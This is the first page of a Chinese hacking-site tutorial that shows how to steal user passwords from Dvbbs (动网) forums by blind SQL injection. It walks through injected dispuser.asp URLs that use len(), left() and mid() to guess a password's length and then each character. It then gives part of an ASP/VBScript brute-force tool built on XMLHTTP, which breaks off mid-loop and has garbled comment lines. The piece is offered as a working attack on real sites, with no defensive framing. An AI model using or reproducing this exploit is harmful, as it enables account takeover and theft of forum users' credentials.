当前位置：清风网络学院 → 工具软件 → 加密破解 → 暴力破解动网论坛密码程序


	精品推荐


特别推荐

·DVD影片（区码）的保护与破解

·常用破解网络密码的方法多个

·攻破Windows系统加密保护之EFS解密


热点TOP10

·溯雪使用说明

·万能五笔2001注册码分析及暴力破解上

·破解windowsXP,window2000的开机密码

·RichEdit 控件：更多的正文操作

·破解入门教学(二)

·五种windows密码设置及破解

·软件狗[Dongles]的加密与解密技术

·破解程序及注册机使用方法

·兰陵邮件快递(LLbulkmailer V1.1)

·即时语音提示 & 校对软件InsTalk注册码及注册机上

暴力破解动网论坛密码程序

日期：2008年5月26日作者：查看:[大字体中字体小字体]

　要破一个名叫ABC的用户密码，察看abc的用户资料，给出的连接是http://xxxxx/dispuser.asp?name=abc，在dispuser.asp中，读取参数的语句是: username=trim(request(“name”))，数据库的查询的语句是: sql=“select * from [user] where username='“&username&”'”,abc就是直接被作为了dispuer的一个参数username。另外，如果该用户不存在，程序就会给出提示，就再写入个查询密码的条件，在where　username=abc后面加上and userpassword=“******”，可以先用len函数试出用户的密码位数，地址就这么写http://xxxxx/dispuser.asp?name=abc%20and%20len
(userpassword)=5%20and%201=1，这么看可能不好理解，放到sql语句里其实就是这样子：sql=“select * from [User] where username=abc and len(UserPassword)=5 and 1=1”，%20是空格，abc后面的单引号和'1'='1里的单引号都是为了和sql语句相匹配。该用户不存在?那就说明符合这个条件的用户没有，继续，把5换成6，7，8，依此类推，只要能显示出用户资料了，就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了，继续要用到VBS，可以用left或right或mid函数，http://xxxxx/dispuser.asp?name=abc%20and%20left(userpassword,1)=a，如果猜对了就给出用户资料，猜错了就给出该用户不存在的提示，就可以直接在程序里面用xmlhttp来获取指定网址的内容，然后根据提供的关键字来判断是否猜对了，先用前面说的len方法从1开始穷举搞定为止，然后在针对每一位密码用mid函数集合键盘的asc码的范围（33到126），在程序里面用二分法来逐步缩小范围，几个循环就完成了。

注意，只适用了部分动网论坛版本。(基本一分钟破解出来一个密码)
以下是代码：

<%
response.buffer=false
为防止程序陷入死循环，初始化一些最大重试值
Dim MaxPassLen,MaxPassAsc
MaxPassLen=20 密码最大长度
MaxPassAsc=20
==== 字符转换
Function bytes2BSTR(vIn)
strReturn = ""
For j = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,j,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,j+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) *
&H100 + CInt(NextCharCode))
j = j + 1
End If
Next
bytes2BSTR = strReturn
End Function
下面是取网页内容 ==========
Function GetUrl(Url)
set oSend=createobject("Microsoft.XMLHTTP")
SourceCode = oSend.open ("GET",url,false)
oSend.send()
SourceCode = bytes2BSTR(oSend.responseBody)
GetUrl = SourceCode
End Function
下面是判断返回页面效果
Function ChkPage(SourceCode,SucKey,ErrKey)
if Instr(SourceCode,SucKey) > 0 then
ChkPage=true 页面返回成功
exit function
end if
if Instr(SourceCode,ErrKey) > 0 then
ChkPage=false 页面出错
exit function
end if
ChkPage=false 关键字信息不对或者是页面未连接
response.write("关键字信息不对或者是页面未连接")
response.end
End Function

开始破解
Dim url,username,password,SucKey,

Dim PassLenUrl
Dim PassLen
Dim ChkPassLen

If request("begin")<>"" then
response.cookies("PassLen")=0
url=request("url")
username=request("username")
password=request("password")
SucKey=request("SucKey")
ErrKey=request("ErrKey")
response.write("第一步，破解密码长度<BR>")

PassLen = 1
ChkPassLen = false

[1] [2] [3] 下一页

上一篇:MySQL数据导入导出方法与工具介绍之一

下一篇:MySQL数据导入导出方法与工具介绍之二

·Windows Vista Ultimate中文旗舰版下载+简单破解（支持迅雷HTTP & BT)

·添加或删除启动时自动运行的程序

·Excel密码保护的解除方法与解除原理

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.vipcn.com All Rights Reserved.	鄂ICP备05000083号Powered by:vipcn